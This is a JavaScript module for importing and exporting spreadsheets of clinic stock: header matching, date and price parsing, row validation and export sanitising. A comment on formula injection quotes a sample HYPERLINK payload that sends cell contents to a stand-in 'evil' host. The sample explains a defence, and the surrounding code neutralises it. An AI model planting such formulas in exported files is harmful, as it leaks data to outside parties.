/**
 * Spreadsheet import and export — design/PROTOTYPE-SPEC.md §6 and §"Excel".
 *
 * Everything here is pure: header matching, cell coercion, date parsing and the
 * sanitising applied on the way out. The file reading itself happens in the
 * browser (see `apps/web`), and the API re-validates every row, because a row
 * arriving over HTTP is untrusted whoever parsed it.
 *
 * A clinic's first real interaction with this product is usually importing the
 * spreadsheet they have been keeping for years. It will have inconsistent
 * headers, dates in three formats and blank rows in the middle. Being forgiving
 * here is the difference between "it worked" and "it doesn't support my file".
 */
import { z } from 'zod';
import { isLocalDate } from '../clock.js';
/**
 * Accepted spellings for each import column, lowercased.
 *
 * Taken from the prototype's `pick(...)` calls
 * (design/Clinic Stock v2.dc.html:4511) and widened where a real export would
 * plausibly differ — a supplier's sheet says "Item", an accountant's says
 * "Description".
 */
export const IMPORT_HEADERS = {
    name: ['product', 'name', 'product name', 'item', 'item name', 'description'],
    brand: ['brand', 'manufacturer', 'supplier'],
    category: ['category', 'group'],
    classification: ['type', 'classification'],
    qty: ['qty', 'quantity', 'in stock', 'stock', 'units', 'on hand'],
    unitCostPence: ['unit cost', 'cost', 'unit cost (£)', 'cost price', 'price'],
    retailPricePence: ['retail', 'retail price', 'retail (£)', 'rrp', 'sale price'],
    lot: ['lot', 'batch', 'lot / batch', 'lot number', 'batch number'],
    expiry: ['expiry', 'expiry date', 'exp', 'expires', 'best before'],
    minLevel: ['min', 'min level', 'minimum', 'reorder level', 'min qty'],
};
/** The header row written by `Download template`, in order. */
export const TEMPLATE_HEADERS = [
    'Product',
    'Brand',
    'Category',
    'Type',
    'Qty',
    'Unit cost',
    'Retail price',
    'Lot',
    'Expiry',
    'Min level',
];
/** Example rows in the template — design/Clinic Stock v2.dc.html:4489. */
export const TEMPLATE_ROWS = [
    ['Profhilo', 'IBSA', 'Bio-remodelling', 'Treatment', 5, 110, '', 'PF-2261', '2027-03-31', 2],
    ['C E Ferulic', 'SkinCeuticals', 'Antioxidant serum', 'Retail', 6, 140, 165, 'SC-9921', '2027-01-30', 2],
    ['Lidocaine 5% numbing', 'Generic', 'Numbing cream', 'Consumable', 9, 15, '', 'LD-0093', '2026-12-01', 4],
];
const normaliseHeader = (h) => h.toLowerCase().trim().replace(/\s+/g, ' ');
/**
 * Pulls one field out of a row keyed by whatever headers the file happened to
 * use. Case- and whitespace-insensitive; returns `undefined` when absent.
 */
export function pickCell(row, field) {
    const wanted = IMPORT_HEADERS[field];
    for (const key of Object.keys(row)) {
        if (wanted.includes(normaliseHeader(key)))
            return row[key];
    }
    return undefined;
}
/** Excel's day zero. Serial 1 is 1 Jan 1900, with the famous 1900 leap-year bug. */
const EXCEL_EPOCH_UTC = Date.UTC(1899, 11, 30);
/**
 * Expiry cells arrive as real dates, Excel serial numbers, or text — often all
 * three in one file, because the column was typed by different people over
 * years. design/PROTOTYPE-SPEC.md §"Excel" requires all three.
 *
 * Returns `null` for anything unparseable rather than guessing: a wrong expiry
 * on a medical consumable is worse than a missing one, because a missing one is
 * visible and a wrong one is not.
 */
export function parseImportDate(value) {
    if (value === null || value === undefined || value === '')
        return null;
    if (value instanceof Date) {
        return Number.isNaN(value.getTime()) ? null : toLocalDate(value);
    }
    if (typeof value === 'number') {
        // Serials below 1 are times-of-day, not dates; absurdly large ones are not
        // dates either. 2958465 is 31 Dec 9999.
        if (!Number.isFinite(value) || value < 1 || value > 2_958_465)
            return null;
        return toLocalDate(new Date(EXCEL_EPOCH_UTC + Math.floor(value) * 86_400_000));
    }
    if (typeof value === 'string') {
        const text = value.trim();
        if (text === '')
            return null;
        // Already ISO — take it directly rather than through Date, which would
        // apply the local timezone and can shift the day.
        if (isLocalDate(text))
            return text;
        /**
         * UK-format dates. `new Date('03/04/2027')` is 4 March in the US reading
         * and 3 April in ours — silently wrong for half the year. The launch market
         * is UK clinics, so day-first is the correct interpretation here.
         */
        const dmy = /^(\d{1,2})[/.-](\d{1,2})[/.-](\d{2}|\d{4})$/.exec(text);
        if (dmy) {
            const [, d, m, y] = dmy;
            const year = y.length === 2 ? 2000 + Number(y) : Number(y);
            const month = Number(m);
            const day = Number(d);
            if (month < 1 || month > 12 || day < 1 || day > 31)
                return null;
            const dt = new Date(Date.UTC(year, month - 1, day));
            // Rejects 31/02 rather than rolling it into March.
            if (dt.getUTCMonth() !== month - 1 || dt.getUTCDate() !== day)
                return null;
            return toLocalDate(dt);
        }
        const parsed = new Date(text);
        return Number.isNaN(parsed.getTime()) ? null : toLocalDate(parsed);
    }
    return null;
}
function toLocalDate(d) {
    return d.toISOString().slice(0, 10);
}
/** Money cells: "£12.50", "12,50", " 12.5 " all mean the same thing. */
export function parseImportMoneyPence(value) {
    if (value === null || value === undefined || value === '')
        return null;
    if (typeof value === 'number') {
        return Number.isFinite(value) && value >= 0 ? Math.round(value * 100) : null;
    }
    if (typeof value !== 'string')
        return null;
    const cleaned = value.trim().replace(/[£$€\s]/g, '').replace(/,/g, '');
    if (cleaned === '')
        return null;
    const n = Number(cleaned);
    return Number.isFinite(n) && n >= 0 ? Math.round(n * 100) : null;
}
export function parseImportInt(value, fallback) {
    if (value === null || value === undefined || value === '')
        return fallback;
    const n = typeof value === 'number' ? value : Number(String(value).trim());
    if (!Number.isFinite(n))
        return fallback;
    return Math.max(0, Math.round(n));
}
/**
 * SPREADSHEET FORMULA INJECTION.
 *
 * Excel, LibreOffice and Google Sheets treat a cell beginning `=`, `+`, `-`,
 * `@`, tab or carriage return as a formula. A product named
 * `=HYPERLINK("http://evil/?"&A1,"Click")` is inert in our UI and becomes a live
 * formula the moment a clinic exports and opens the file.
 *
 * This is a real path here: staff at a clinic name products, and the person who
 * opens the export is usually someone else — often the owner or their
 * accountant. Prefixing a single quote makes the cell literal text; Excel shows
 * the value and does not evaluate it.
 */
const FORMULA_TRIGGERS = ['=', '+', '-', '@', '\t', '\r'];
export function sanitiseForSpreadsheet(value) {
    if (typeof value !== 'string' || value === '')
        return value;
    return FORMULA_TRIGGERS.includes(value[0]) ? `'${value}` : value;
}
/**
 * One row as the browser sends it after parsing a file. Everything is optional
 * except the name, because real spreadsheets have gaps.
 */
export const importRowSchema = z.object({
    name: z.string().trim().min(1, 'Every row needs a product name').max(120),
    brand: z.string().trim().max(80).nullable().optional(),
    category: z.string().trim().max(80).nullable().optional(),
    classification: z.string().trim().max(80).nullable().optional(),
    qty: z.number().int().min(0).max(1_000_000).optional(),
    unitCostPence: z.number().int().min(0).max(100_000_000).nullable().optional(),
    retailPricePence: z.number().int().min(0).max(100_000_000).nullable().optional(),
    lot: z.string().trim().max(80).nullable().optional(),
    expiry: z
        .string()
        .regex(/^\d{4}-\d{2}-\d{2}$/)
        .nullable()
        .optional(),
    minLevel: z.number().int().min(0).max(1_000_000).optional(),
});
export const importSchema = z.object({
    rows: z
        .array(importRowSchema)
        .min(1, 'That file had no rows we could read')
        /**
         * A cap, not a promise of performance. The whole import runs in one
         * transaction; unbounded input would let one request hold locks across a
         * clinic's entire catalogue for as long as it liked.
         */
        .max(5_000, 'That file is too large to import in one go — split it up'),
    /** Shown in the audit entry so the trail says which file this came from. */
    fileName: z.string().trim().max(200).optional(),
});
/**
 * Maps free-text from the Type column onto one of the account's classifications.
 * Falls back to `null`, which the API reads as "use the account default" rather
 * than inventing a classification the clinic never made.
 */
export function matchClassification(text, classifications) {
    if (!text)
        return null;
    const wanted = text.toLowerCase().trim();
    if (wanted === '')
        return null;
    const exact = classifications.find((c) => c.label.toLowerCase() === wanted);
    if (exact)
        return exact;
    // "Treatment products" should match a sheet that just says "Treatment".
    return (classifications.find((c) => c.label.toLowerCase().includes(wanted) || wanted.includes(c.label.toLowerCase())) ?? null);
}
//# sourceMappingURL=spreadsheet.js.map